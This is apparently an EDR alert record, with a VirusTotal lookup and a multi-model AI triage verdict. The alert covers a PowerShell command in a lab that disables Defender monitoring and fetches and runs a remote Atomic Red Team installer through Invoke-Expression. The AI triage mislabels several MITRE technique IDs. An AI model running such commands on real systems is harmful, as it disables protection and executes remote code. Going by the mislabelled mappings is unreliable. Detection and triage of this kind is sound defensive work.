{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00023-WIN-PS_Invoke_Expression_Usage",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1041 -CheckPrereqs ; Invoke-AtomicTest T1041 -GetPrereqs ; Invoke-AtomicTest T1041 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 152584192,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld50FC.tmp.bat T1041 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4558848,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 7784,
        "THIS_ATOM": "c1d5d0ed21717873736d54e669c2a82e",
        "THREADS": 3,
        "TIMESTAMP": 1774364718110,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 7784,
      "PROCESS_ID": 7948,
      "THREADS": 31,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "d428e7b6-53db-4782-aa6b-e435e59ef988",
      "event_time": 1774364719190,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 4357,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c1d5d0ed21717873736d54e669c2a82e",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "a7a9b78146a0cc20ecb9bae069c2a832"
    }
  },
  "detect_id": "c5500e40-8321-482a-b937-0c6269c2a833",
  "detect_mtd": {
    "description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
    "falsepositives": [
      "Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
    ],
    "references": [
      "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
      "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
      "https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
      "https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
    ],
    "tags": [
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364723549,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364719\u0026selected=a7a9b78146a0cc20ecb9bae069c2a832",
  "namespace": "general",
  "priority": 2,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "d428e7b6-53db-4782-aa6b-e435e59ef988",
    "event_time": 1774364719190,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 4357,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c1d5d0ed21717873736d54e669c2a82e",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "a7a9b78146a0cc20ecb9bae069c2a832"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-PS_Invoke_Expression_Usage",
  "ts": 1774364723000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.875,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by this PowerShell session?",
    "Were any files modified on the disk during this execution?",
    "Was there any network communication to or from external IPs?",
    "Did this process receive input from a user or was it triggered automatically?"
  ],
  "ioc_analysis": "The command line contains multiple indicators of compromise: IEX (Invoke-Expression) downloading a script from an external URL, Set-MpPreference disabling real-time monitoring, and explicit installation of Atomic Red Team tools. While the process path is legitimate (System32), the behavior is clearly malicious. The HASH matches the official Microsoft PowerShell binary, but the command execution is not benign.",
  "iocs_extracted": [
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "Install-PackageProvider -Name NuGet",
    "Invoke-AtomicTest T1041"
  ],
  "mitre_techniques": [
    "T1567.002 (Download and Run Remote Script)",
    "T1567.003 (Use Alternative Deployment Method)",
    "T1562.001 (Abuse Elevation Control Mechanism)",
    "T1547.001 (Exploit Public-Facing Application)"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to raw.githubusercontent.com at the network perimeter",
    "Review and disable any scheduled tasks or services that may have been modified",
    "Perform a full forensic image of the affected system",
    "Check for persistence mechanisms in startup folders, registry run keys, and scheduled tasks"
  ],
  "risk_score": 88,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a high-confidence malicious PowerShell execution using IEX to download and execute remote scripts from GitHub, combined with disabling antivirus protections and installing the Atomic Red Team framework. The process is running under SYSTEM privileges, which significantly increases the impact of this attack.\n\n**IOC Analysis:** The command line contains multiple indicators of compromise: IEX (Invoke-Expression) downloading a script from an external URL, Set-MpPreference disabling real-time monitoring, and explicit installation of Atomic Red Team tools. While the process path is legitimate (System32), the behavior is clearly malicious. The HASH matches the official Microsoft PowerShell binary, but the command execution is not benign.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.8\nThe PowerShell process is legitimate and located in the expected System32 directory, but its command line involves modifying system security settings, disabling antivirus monitoring, and downloading a script from GitHub, which is highly suspicious for malicious activity.\n\n**IOC Analysis:** The FILE_PATH is a known legitimate Windows binary in C:\\Windows\\System32\\, so it is expected to be benign based on location. However, the command line includes actions like changing execution policy, disabling real-time monitoring, and downloading a script from an external source, which are indicators of potential malicious intent. The hash is signed, but the behavior suggests an attack. The parent process chain indicates possible automation or scheduled task execution.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 80% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.8,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}